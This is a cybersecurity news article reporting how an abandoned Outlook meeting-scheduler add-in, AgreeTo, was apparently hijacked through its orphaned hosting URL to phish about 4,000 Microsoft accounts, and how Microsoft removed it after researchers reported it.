Malicious Outlook Add-in Exposes 4,000 Accounts

Malicious Outlook Add-in Exposes 4,000 Accounts

Posted on By CWS

Malicious Outlook Add-in Compromises Accounts

In a significant cybersecurity breach, researchers have uncovered the first known case of a malicious Microsoft Outlook add-in being used to exploit users in real-world scenarios. This incident involved a compromised meeting scheduler add-in named AgreeTo, which was responsible for stealing over 4,000 Microsoft account credentials, credit card information, and responses to banking security questions.

Origins of the AgreeTo Add-in

Initially launched as a legitimate open-source project in December 2022, AgreeTo was available in the Microsoft Office Add-in Store. The tool, which served as a functional meeting scheduler, garnered positive reviews from users. However, its developer eventually abandoned the project and removed its associated Vercel deployment, leaving the add-in’s hosting URL orphaned and open for registration.

Seizing this opportunity, an attacker claimed the available URL and set up a phishing kit. Because the add-in remained listed in Microsoft’s store, the malicious phishing page was displayed directly in the trusted Outlook sidebar for users who had the add-in installed or downloaded it afresh.

Technical Vulnerabilities Exploited

The attack leveraged a flaw in the architecture of Office add-ins, which differ from traditional software as they are ‘remote dynamic dependencies.’ These are essentially XML manifests that load a URL within an iframe. Microsoft reviewed the manifest during the initial submission but did not continuously verify the live content hosted at the approved URL, allowing the attacker to replace the scheduling tool with a fake Microsoft login page without triggering a security review.

When users accessed AgreeTo, they were prompted to log in, unknowingly sending their credentials and IP addresses to the attacker through a Telegram bot. The attacker also accessed banking details and security answers targeting Canadian institutions.

Implications and Response

Koi Security uncovered the campaign after identifying the attacker’s poorly secured exfiltration channel, recovering the dataset of 4,000 victims. Although the add-in had permissions to read and modify emails, the primary focus of the attack was credential harvesting. Following the report, Microsoft has removed the add-in from its store.

This incident underscores a critical supply chain risk, highlighting how trusted software can silently become malicious if its infrastructure is neglected. It serves as a stark reminder of the importance of continuous security verification in software management.

Stay informed by following us on Google News, LinkedIn, and X for daily updates on cybersecurity. Reach out to us to share your stories.

Cyber Security News Tags:, , , , , , , , ,

Related Posts

OpenAI Set to Acquire Analytics Platform Statsig in .1 Billion Agreement OpenAI Set to Acquire Analytics Platform Statsig in $1.1 Billion Agreement Cyber Security News
Android Remote Data-Wipe Malware Attacking Users Leveraging Google’s Find Hub Android Remote Data-Wipe Malware Attacking Users Leveraging Google’s Find Hub Cyber Security News
New Critical n8n Vulnerability Allow Attackers to Execute Arbitrary Commands New Critical n8n Vulnerability Allow Attackers to Execute Arbitrary Commands Cyber Security News
HydraPWK Penetration Testing OS With Necessary Hacking Tools and Simplified Interface HydraPWK Penetration Testing OS With Necessary Hacking Tools and Simplified Interface Cyber Security News
CISA Warns Of Windows Improper Access Control Vulnerability Exploited In Attacks CISA Warns Of Windows Improper Access Control Vulnerability Exploited In Attacks Cyber Security News
Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework Cyber Security News